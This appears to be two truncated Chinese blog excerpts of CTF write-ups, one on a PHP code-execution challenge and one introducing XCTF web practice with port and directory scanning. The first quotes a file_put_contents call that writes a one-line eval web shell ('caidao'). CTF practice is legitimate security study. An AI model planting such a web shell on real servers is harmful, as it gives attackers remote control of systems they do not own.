目录PHP execise很明显是PHP代码执行漏洞，当初做的时候绕了弯路。当时的思路是：touch 1.php 然后file_put_contents('1.php','<?php @eval($_POST['caidao']...

目录前言准备参加某个CTF竞赛，所以找了XCTF平台上的一些题目练练。也就随手做了个记录。只做了Web题目。（⊙﹏⊙‖∣ 逆向也不会啊）第一题 热身题这题还是比较简单的。考渗透测试的思路。第一步扫端口，第二部肯定扫目录。于是拿出AWVS。